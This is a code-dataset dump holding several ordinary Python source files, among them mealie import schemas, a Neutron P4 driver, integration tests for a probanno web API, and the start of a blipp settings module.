hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f393860dc4d8f40166995d44a4269a5f45efbb2d | 480 | py | Python | mealie/schema/restore.py | danielpalstra/mealie | 6c549ff99329e494bc6aad2109973e7eec6c445e | [
"MIT"
] | 1,927 | 2021-01-02T20:01:15.000Z | 2022-03-31T22:49:18.000Z | mealie/schema/restore.py | danielpalstra/mealie | 6c549ff99329e494bc6aad2109973e7eec6c445e | [
"MIT"
] | 545 | 2021-01-02T20:32:28.000Z | 2022-03-31T23:37:08.000Z | mealie/schema/restore.py | danielpalstra/mealie | 6c549ff99329e494bc6aad2109973e7eec6c445e | [
"MIT"
] | 254 | 2021-01-03T00:20:07.000Z | 2022-03-23T22:37:21.000Z | from typing import Optional
from pydantic.main import BaseModel
| 12.631579 | 37 | 0.733333 | from typing import Optional
from pydantic.main import BaseModel
class ImportBase(BaseModel):
name: str
status: bool
exception: Optional[str]
class RecipeImport(ImportBase):
slug: Optional[str]
class ThemeImport(ImportBase):
pass
class SettingsImport(ImportBase):
pass
class GroupImport(ImportBase):
pass
class UserImport(ImportBase):
pass
class CustomPageImport(ImportBase):
pass
class NotificationImport(ImportBase):
pass
| 0 | 223 | 184 |
807a761fa093a53e100a03a206335656aefa8eff | 4,016 | py | Python | networking_p4/services/service_drivers/default/driver.py | osinstom/networking-p4 | 3b82025090b6b2bf1e9faa58492d13ed1da6c34f | [
"Apache-2.0"
] | 2 | 2019-12-26T08:53:25.000Z | 2020-05-13T11:53:51.000Z | networking_p4/services/service_drivers/default/driver.py | osinstom/networking-dppx | 3b82025090b6b2bf1e9faa58492d13ed1da6c34f | [
"Apache-2.0"
] | null | null | null | networking_p4/services/service_drivers/default/driver.py | osinstom/networking-dppx | 3b82025090b6b2bf1e9faa58492d13ed1da6c34f | [
"Apache-2.0"
] | null | null | null | from networking_p4.services.service_drivers.default.services.attach_module import AttachModuleService
from networking_p4.services.service_drivers.default.services.configure_module import ConfigureModuleService
from networking_p4.services.service_drivers.default.services.create_module import CreateModuleService
from networking_p4.services.service_drivers.default.services.delete_module import DeleteModuleService
from networking_p4.services.service_drivers.default.services.detach_module import DetachModuleService
from networking_p4.services.service_drivers.default.services.module_configuration import GetModuleConfigurationService
from networking_p4.services.service_drivers.default.services.unconfigure_module import UnconfigureModuleService
from networking_p4.services.service_drivers.default.services.update_module import UpdateModuleService
from networking_p4.services.service_drivers.driver_api import P4DriverApi, P4DriverBase
from oslo_log import log as logging
from networking_p4.services.service_drivers.default import rpc as p4_rpc
from networking_p4.services.common import rpc_topics
from neutron_lib import context as n_context
import neutron.common.rpc as n_rpc
LOG = logging.getLogger(__name__)
class DefaultP4Driver(P4DriverApi,
P4DriverBase):
""" Implementation of default driver for P4 service """
| 44.131868 | 118 | 0.758217 | from networking_p4.services.service_drivers.default.services.attach_module import AttachModuleService
from networking_p4.services.service_drivers.default.services.configure_module import ConfigureModuleService
from networking_p4.services.service_drivers.default.services.create_module import CreateModuleService
from networking_p4.services.service_drivers.default.services.delete_module import DeleteModuleService
from networking_p4.services.service_drivers.default.services.detach_module import DetachModuleService
from networking_p4.services.service_drivers.default.services.module_configuration import GetModuleConfigurationService
from networking_p4.services.service_drivers.default.services.unconfigure_module import UnconfigureModuleService
from networking_p4.services.service_drivers.default.services.update_module import UpdateModuleService
from networking_p4.services.service_drivers.driver_api import P4DriverApi, P4DriverBase
from oslo_log import log as logging
from networking_p4.services.service_drivers.default import rpc as p4_rpc
from networking_p4.services.common import rpc_topics
from neutron_lib import context as n_context
import neutron.common.rpc as n_rpc
LOG = logging.getLogger(__name__)
class DefaultP4Driver(P4DriverApi,
P4DriverBase):
""" Implementation of default driver for P4 service """
def __init__(self):
LOG.info("DefaultP4Driver started.")
self.rpc_client = None
self.rpc_ctx = None
self.callbacks = dict()
def initialize(self):
# super(DefaultP4Driver, self).initialize()
LOG.info("DefaultP4Driver started.")
self.rpc_client = p4_rpc.P4AgentRpcClient(
rpc_topics.P4_AGENT
)
self.rpc_ctx = n_context.get_admin_context()
self._setup_rpc()
# initialize services
self.create_module_svc = CreateModuleService(self.rpc_client)
self.update_module_svc = UpdateModuleService(self.rpc_client)
self.delete_module_svc = DeleteModuleService(self.rpc_client)
self.attach_module_svc = AttachModuleService(self.rpc_client)
self.detach_module_svc = DetachModuleService(self.rpc_client)
self.configure_module_svc = ConfigureModuleService(self.rpc_client)
self.unconfigure_module_svc = UnconfigureModuleService(self.rpc_client)
self.get_module_configuration_svc = GetModuleConfigurationService(self.rpc_client)
def add_callback(self, topic, callback):
self.callbacks[topic] = callback
def _setup_rpc(self):
# Setup a rpc server
self.topic = rpc_topics.P4_PLUGIN
self.endpoints = [p4_rpc.P4RpcCallback(self)]
self.conn = n_rpc.create_connection()
self.conn.create_consumer(self.topic, self.endpoints, fanout=False)
self.conn.consume_in_threads()
def create_module(self, context):
LOG.info("DefaultDriver: Creating P4 module")
self.create_module_svc.handle(context)
def update_module(self, context):
LOG.info("DefaultDriver: Updating program")
self.update_module_svc.handle(context)
def delete_module(self, context):
LOG.info("DefaultDriver: Deleting P4 module")
self.delete_module_svc.handle(context)
def attach_module(self, context):
LOG.info("DefaultDriver: Attaching P4 module")
self.attach_module_svc.handle(context)
def detach_module(self, context):
LOG.info("DefaultDriver: Detaching P4 module")
self.detach_module_svc.handle(context)
def configure_module(self, context):
LOG.info("DefaultDriver: Configuring P4 module")
self.configure_module_svc.handle(context)
def unconfigure_module(self, context):
LOG.info("DefaultDriver: Unconfiguring P4 module")
self.unconfigure_module_svc.handle(context)
def get_module_configuration(self, context):
LOG.info("DefaultDriver: Get P4 module configuration")
return self.get_module_configuration_svc.handle(context)
| 2,343 | 0 | 324 |
a84b00a226e429cf7c8dcfc2193791c10769443b | 160 | py | Python | Codes/Miscellaneous/hello_world.py | datta-agni/python-codes | d902d0aaf23d2ea4b60ed7ecab0d593e3334c23b | [
"MIT"
] | null | null | null | Codes/Miscellaneous/hello_world.py | datta-agni/python-codes | d902d0aaf23d2ea4b60ed7ecab0d593e3334c23b | [
"MIT"
] | null | null | null | Codes/Miscellaneous/hello_world.py | datta-agni/python-codes | d902d0aaf23d2ea4b60ed7ecab0d593e3334c23b | [
"MIT"
] | null | null | null | # Hello World program.
# This is where you write a comment.
if __name__ == "__main__":
hello_world()
| 17.777778 | 36 | 0.6625 | # Hello World program.
# This is where you write a comment.
def hello_world() -> None:
print("HELLO! WORLD")
if __name__ == "__main__":
hello_world()
| 31 | 0 | 22 |
c34a5ef2ecb12157c6357b1cc9ffba018bbf96f0 | 26,794 | py | Python | test/api_tests.py | kingb12/flask_probanno | c0c57d3bac987eebc037ac21903c85ac628705a1 | [
"MIT"
] | null | null | null | test/api_tests.py | kingb12/flask_probanno | c0c57d3bac987eebc037ac21903c85ac628705a1 | [
"MIT"
] | null | null | null | test/api_tests.py | kingb12/flask_probanno | c0c57d3bac987eebc037ac21903c85ac628705a1 | [
"MIT"
] | null | null | null | import requests
import unittest
import json
import uuid
from flask_probanno import GET, POST, PUT
from controllers.probanno_management import CALCULATE_PROBANNO_JOB
from controllers.job import COMPLETE
BASE_URL = "http://probannoweb.systemsbiology.net/api"
HEADERS = {'cache-control': 'no-cache'}
FASTA_1 = '267377'
CACHED_FASTA = '243232'
CACHED_FASTA_NAME = 'Methanocaldococcus jannaschii (strain ATCC 43067 / DSM 2661 / JAL-1 / JCM 10045 / NBRC 100440)'
NOT_A_FASTA = 'abcdef'
MY_FASTA_NAME = 'my_sequence'
TEST_MODEL_FILE = 'maripaludis_model.json'
GAPFILL_MODEL_JOB = "gapfill_model"
def make_api_request(path, method, headers, params=None, files=None, data=None):
"""
helper method for making a request and unpacking the JSON result
:param path: sub path of the API
:param method: HTTP method
:param headers: Associated headers
:return: HTTP result
"""
response = requests.request(method, BASE_URL + path, headers=headers, params=params, files=files, data=data)
return response
def make_and_unpack_request(path, method, headers, params=None, files=None, data=None):
"""
helper method for making a request and unpacking the JSON result
:param path: sub path of the API
:param method: HTTP method
:param headers: Associated headers
:return: HTTP result
"""
response = make_api_request(path, method, headers, params=params, files=files, data=data)
return json.loads(response.text)
if __name__ == '__main__':
unittest.main()
| 49.618519 | 132 | 0.542547 | import requests
import unittest
import json
import uuid
from flask_probanno import GET, POST, PUT
from controllers.probanno_management import CALCULATE_PROBANNO_JOB
from controllers.job import COMPLETE
BASE_URL = "http://probannoweb.systemsbiology.net/api"
HEADERS = {'cache-control': 'no-cache'}
FASTA_1 = '267377'
CACHED_FASTA = '243232'
CACHED_FASTA_NAME = 'Methanocaldococcus jannaschii (strain ATCC 43067 / DSM 2661 / JAL-1 / JCM 10045 / NBRC 100440)'
NOT_A_FASTA = 'abcdef'
MY_FASTA_NAME = 'my_sequence'
TEST_MODEL_FILE = 'maripaludis_model.json'
GAPFILL_MODEL_JOB = "gapfill_model"
class TestSessionMethods(unittest.TestCase):
def test_get_session(self):
try:
session = make_and_unpack_request("/session", GET, HEADERS)
# exception below indicates failure
my_uuid = uuid.UUID(session)
finally:
clear_session_values(session, clear_session=True)
class TestProbannoMethods(unittest.TestCase):
def test_calculate_likelihoods_get(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# un-cached
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session), params={"fasta_id": FASTA_1})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == FASTA_1
# cached
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session), params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# 404 FASTA not found
response = make_api_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": NOT_A_FASTA})
assert response.status_code == 404
# 400 No session
response = make_api_request("/probanno/calculate", GET, HEADERS,
params={"fasta_id": FASTA_1})
# 400 bad session
response = make_api_request("/probanno/calculate", GET, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_calculate_likelihoods_put(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# remove any values that would have been cached
files = {'fasta': open('267377.fasta', 'rb')}
data = {'fasta_id': MY_FASTA_NAME}
# un-cached
job = make_and_unpack_request("/probanno/calculate", PUT, authorize_headers(session), files=files, data=data)
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == MY_FASTA_NAME
# 400 no FASTA
response = make_api_request("/probanno/calculate", PUT, authorize_headers(session),
data=data)
# 400 no FASTA_ID
response = make_api_request("/probanno/calculate", PUT, authorize_headers(session),
files=files)
assert response.status_code == 400
# 400 No session
response = make_api_request("/probanno/calculate", PUT, HEADERS,
params={"fasta_id": FASTA_1})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/probanno/calculate", PUT, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_get_likelihoods(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/probanno", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(response.status_code == 404)
# cached: populate it for our session
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# Now actually check retrieval
result = make_and_unpack_request("/probanno", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(type(result) == list)
# 400 No session
response = make_api_request("/probanno", GET, HEADERS,
params={"fasta_id": FASTA_1})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/probanno", GET, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
response = make_api_request("/probanno", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/probanno", GET, authorize_headers(session),
params={"fasta_id": NOT_A_FASTA})
assert response.status_code == 404
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_list_likelihoods(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
result = make_and_unpack_request("/probanno/list", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(len(result) == 0 and type(result) == list)
# cached: populate it for our session
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# Now actually check retrieval
result = make_and_unpack_request("/probanno/list", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(type(result) == list)
assert(len(result) == 1)
assert(type(result[0]) == dict)
assert(result[0]['name'] == CACHED_FASTA_NAME)
assert(result[0]['fasta_id'] == CACHED_FASTA)
# 400 No session
response = make_api_request("/probanno/list", GET, HEADERS,
params={"fasta_id": FASTA_1})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/probanno/list", GET, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_download_likelihoods(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/probanno/download", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(response.status_code == 404)
# cached: populate it for our session
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# Now actually check retrieval
result = make_api_request("/probanno/download", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(type(result.content) == str)
assert (type(json.loads(result.content) == list))
# 400 No session
response = make_api_request("/probanno", GET, HEADERS,
params={"fasta_id": FASTA_1})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/probanno", GET, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
class TestModelMethods(unittest.TestCase):
def test_get_model(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
job = None
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert(response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result) == dict)
# 400 No session
response = make_api_request("/model", GET, HEADERS,
params={"model_id": model_id})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model", GET, authorize_headers(str(uuid.uuid4())),
params={"model_id": model_id})
assert response.status_code == 400
response = make_api_request("/model", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA})
assert response.status_code == 404
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_download_model(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/model/download", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
job = None
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_api_request("/model/download", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result.content) == str)
assert(type(json.loads(result.content) == dict))
# 400 No session
response = make_api_request("/model/download", GET, HEADERS,
params={"model_id": model_id})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model/download", GET, authorize_headers(str(uuid.uuid4())),
params={"model_id": model_id})
assert response.status_code == 400
response = make_api_request("/model/download", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/model/download", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA})
assert response.status_code == 404
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_model_put(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
f = open(TEST_MODEL_FILE, 'rb')
try:
# search for, expect missing
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Update Case
f = open(TEST_MODEL_FILE, 'rb')
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result) == dict)
# 400 No session
response = make_api_request("/model", PUT, HEADERS,
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model", PUT, authorize_headers(str(uuid.uuid4())),
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
response = make_api_request("/model", PUT, HEADERS,
params=None)
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
f.close()
def test_model_post(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
f = open(TEST_MODEL_FILE, 'rb')
try:
# search for, expect missing
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
job = None
response = make_api_request("/model", POST, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result) == dict)
# 400 No session
response = make_api_request("/model", POST, HEADERS,
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model", POST, authorize_headers(str(uuid.uuid4())),
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
response = make_api_request("/model", POST, HEADERS,
params=None)
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
f.close()
def test_model_list(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
result = make_and_unpack_request("/model/list", GET, authorize_headers(session))
assert (type(result) == list and len(result) == 0)
# cached: populate it for our session
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model/list", GET, authorize_headers(session))
assert (type(result) == list and len(result) == 1)
# 400 No session
response = make_api_request("/model/list", GET, HEADERS)
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model/list", GET, authorize_headers(str(uuid.uuid4())))
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_model_gapfill(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# cached
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# Now actually check gap-filling
job = make_and_unpack_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": model_id,
"fasta_id": CACHED_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert job['sid'] == session
assert job['job'] == GAPFILL_MODEL_JOB
assert job['target'] == model_id
# 400 No session
response = make_api_request("/model/gapfill", GET, HEADERS,
params={"model_id": model_id})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model/gapfill", GET, authorize_headers(str(uuid.uuid4())),
params={"model_id": model_id})
assert response.status_code == 400
response = make_api_request("/model/gapfill", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": model_id,
"fasta_id": NOT_A_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert response.status_code == 404
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA,
"fasta_id": CACHED_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert response.status_code == 404
# Test missing arguments
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA,
"fasta_id": CACHED_FASTA,
"template": "GramNegative"})
assert response.status_code == 400
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert response.status_code == 400
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
class TestJobMethods(unittest.TestCase):
def test_get_job(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
response = make_api_request("/job", GET, authorize_headers(session),
params={"job_id": FASTA_1})
assert response.status_code == 404
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": FASTA_1})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == FASTA_1
job = make_and_unpack_request("/job", GET, authorize_headers(session),
params={"job_id": job['jid']})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == FASTA_1
# 404 JOB not found
response = make_api_request("/job", GET, authorize_headers(session),
params={"job_id": NOT_A_FASTA})
assert response.status_code == 404
# 400 No session
response = make_api_request("/job", GET, HEADERS,
params={"job_id": job['jid']})
# 400 bad session
response = make_api_request("/job", GET, authorize_headers(str(uuid.uuid4())),
params={"job_id": job['jid']})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_list_job(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
result = make_and_unpack_request("/job/list", GET, authorize_headers(session))
assert type(result) == list and len(result) == 0
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": FASTA_1})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == FASTA_1
result = make_and_unpack_request("/job/list", GET, authorize_headers(session))
assert type(result) == list and len(result) == 1
# 400 No session
response = make_api_request("/job/list", GET, HEADERS)
# 400 bad session
response = make_api_request("/job/list", GET, authorize_headers(str(uuid.uuid4())))
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def make_api_request(path, method, headers, params=None, files=None, data=None):
"""
helper method for making a request and unpacking the JSON result
:param path: sub path of the API
:param method: HTTP method
:param headers: Associated headers
:return: HTTP result
"""
response = requests.request(method, BASE_URL + path, headers=headers, params=params, files=files, data=data)
return response
def make_and_unpack_request(path, method, headers, params=None, files=None, data=None):
"""
helper method for making a request and unpacking the JSON result
:param path: sub path of the API
:param method: HTTP method
:param headers: Associated headers
:return: HTTP result
"""
response = make_api_request(path, method, headers, params=params, files=files, data=data)
return json.loads(response.text)
def authorize_headers(session):
auth_headers = {"session": session}
auth_headers.update(HEADERS)
return auth_headers
def clear_session_values(session, clear_session=False):
make_api_request('/session/clear', GET, authorize_headers(session), params={'clear_session': clear_session})
if __name__ == '__main__':
unittest.main()
| 24,656 | 87 | 516 |
053693eaf318fe0813c25cb83119cbcdc6129a3f | 1,896 | py | Python | tests/ext/test_tortoise.py | XeryusTC/fastapi-pagination | 0e1e8542a9ab36f16b6c0ab7af2125b4a03dd095 | [
"MIT"
] | 315 | 2020-11-12T08:41:50.000Z | 2022-03-31T23:23:27.000Z | tests/ext/test_tortoise.py | XeryusTC/fastapi-pagination | 0e1e8542a9ab36f16b6c0ab7af2125b4a03dd095 | [
"MIT"
] | 280 | 2020-11-28T11:17:06.000Z | 2022-03-28T03:21:27.000Z | tests/ext/test_tortoise.py | XeryusTC/fastapi-pagination | 0e1e8542a9ab36f16b6c0ab7af2125b4a03dd095 | [
"MIT"
] | 50 | 2020-12-07T16:21:24.000Z | 2022-03-22T09:04:13.000Z | from fastapi import FastAPI
from pytest import fixture
from tortoise import Model
from tortoise.backends.base.executor import EXECUTOR_CACHE
from tortoise.contrib.fastapi import register_tortoise
from tortoise.fields import IntField, TextField
from fastapi_pagination import Page, add_pagination
from fastapi_pagination.ext.tortoise import paginate
from fastapi_pagination.limit_offset import Page as LimitOffsetPage
from ..base import BasePaginationTestCase, SafeTestClient, UserOut
from ..utils import faker
@fixture(
scope="session",
params=[True, False],
ids=["model", "query"],
)
@fixture(scope="session")
| 25.28 | 75 | 0.683017 | from fastapi import FastAPI
from pytest import fixture
from tortoise import Model
from tortoise.backends.base.executor import EXECUTOR_CACHE
from tortoise.contrib.fastapi import register_tortoise
from tortoise.fields import IntField, TextField
from fastapi_pagination import Page, add_pagination
from fastapi_pagination.ext.tortoise import paginate
from fastapi_pagination.limit_offset import Page as LimitOffsetPage
from ..base import BasePaginationTestCase, SafeTestClient, UserOut
from ..utils import faker
class User(Model):
id = IntField(pk=True)
name = TextField(null=False)
class Meta:
table = "users"
@fixture(
scope="session",
params=[True, False],
ids=["model", "query"],
)
def query(request):
if request.param:
return User
else:
return User.all()
@fixture(scope="session")
def app(query, database_url):
app = FastAPI()
if database_url.startswith("postgresql://"):
database_url = database_url.replace("postgresql://", "postgres://")
if database_url.startswith("sqlite"):
database_url = "sqlite://:memory:"
EXECUTOR_CACHE.clear()
register_tortoise(
app,
modules={"models": [__name__]},
db_url=database_url,
generate_schemas=True,
)
@app.get("/default", response_model=Page[UserOut])
@app.get("/limit-offset", response_model=LimitOffsetPage[UserOut])
async def route():
return await paginate(query)
add_pagination(app)
return app
class TestTortoise(BasePaginationTestCase):
@fixture(scope="session")
async def client(self, app):
with SafeTestClient(app) as c:
yield c
@fixture(scope="session")
async def entities(self, query, client):
await User.all().delete()
for _ in range(100):
await User.create(name=faker.name())
return await User.all()
| 942 | 233 | 90 |
d0a7d576f5e655561b0da5618e1081fc4b02ab4c | 9,647 | py | Python | blipp/settings.py | periscope-ps/blipp | 002d08e911fb94c34d7f05e34883efa8f6138a4f | [
"BSD-3-Clause"
] | null | null | null | blipp/settings.py | periscope-ps/blipp | 002d08e911fb94c34d7f05e34883efa8f6138a4f | [
"BSD-3-Clause"
] | null | null | null | blipp/settings.py | periscope-ps/blipp | 002d08e911fb94c34d7f05e34883efa8f6138a4f | [
"BSD-3-Clause"
] | 1 | 2015-12-14T01:14:39.000Z | 2015-12-14T01:14:39.000Z | # =============================================================================
# periscope-ps (blipp)
#
# Copyright (c) 2013-2016, Trustees of Indiana University,
# All rights reserved.
#
# This software may be modified and distributed under the terms of the BSD
# license. See the COPYING file for details.
#
# This software was created at the Indiana University Center for Research in
# Extreme Scale Technologies (CREST).
# =============================================================================
import ConfigParser
import socket
import netifaces
import utils
SCHEMAS = {
'networkresources': 'http://unis.crest.iu.edu/schema/20160630/networkresource#',
'nodes': 'http://unis.crest.iu.edu/schema/20160630/node#',
'domains': 'http://unis.crest.iu.edu/schema/20160630/domain#',
'ports': 'http://unis.crest.iu.edu/schema/20160630/port#',
'links': 'http://unis.crest.iu.edu/schema/20160630/link#',
'paths': 'http://unis.crest.iu.edu/schema/20160630/path#',
'networks': 'http://unis.crest.iu.edu/schema/20160630/network#',
'topologies': 'http://unis.crest.iu.edu/schema/20160630/topology#',
'services': 'http://unis.crest.iu.edu/schema/20160630/service#',
'blipp': 'http://unis.crest.iu.edu/schema/20160630/blipp#',
'metadata': 'http://unis.crest.iu.edu/schema/20160630/metadata#',
'datum': 'http://unis.crest.iu.edu/schema/20160630/datum#',
'data': 'http://unis.crest.iu.edu/schema/20160630/data#',
'measurement': 'http://unis.crest.iu.edu/schema/20160630/measurement#',
}
MIME = {
'HTML': 'text/html',
'JSON': 'application/json',
